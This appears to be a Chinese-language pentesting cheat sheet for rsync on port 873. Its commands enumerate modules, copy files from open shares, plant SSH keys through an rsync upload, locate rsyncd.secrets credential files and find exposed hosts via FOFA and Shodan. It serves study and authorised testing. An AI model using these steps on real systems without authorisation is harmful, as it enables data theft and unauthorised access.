873 - Rsync

💡 学习提示: 本文档介绍 873 - rsync 的渗透测试方法,适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

默认 port: 873

PORT    STATE SERVICE REASON
873/tcp open  rsync   syn-ack

信息收集

nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection

#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password

Enumerating Shared Folders

Rsync modules are recognized as directory shares that might be protected with passwords. To identify available modules and check if they require passwords, the following commands are used:

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

## Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730

Be aware that some shares might not appear in the list, possibly hiding them. Additionally, accessing some shares might be restricted to specific credentials, indicated by an “Access Denied” message.

暴力破解

Manual Rsync 用法

Upon obtaining a module list, actions depend on whether authentication is needed. Without authentication, listing and copying files from a shared folder to a local directory is achieved through:

## Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name

## Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared

This process recursively transfers files, preserving their attributes and permissions.

With credentials, listing and downloading from a shared folder can be done as follows, where a password prompt will appear:

rsync -av --list-only rsync://[email protected]/shared_name
rsync -av rsync://[email protected]:8730/shared_name ./rsyn_shared

To upload content, such as an authorized_keys file for access, use:

rsync -av home_user/.ssh/ rsync://[email protected]/home_user/.ssh

POST

To locate the rsyncd configuration file, execute:

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)

Within this file, a secrets file parameter might point to a file containing usernames and passwords for rsyncd authentication.

搜索引擎语法

FOFA

# FOFA 搜索语法
port="873"

Shodan

# Shodan 搜索语法
port:873

ZoomEye

# ZoomEye 搜索语法
port:873

📖 参考资料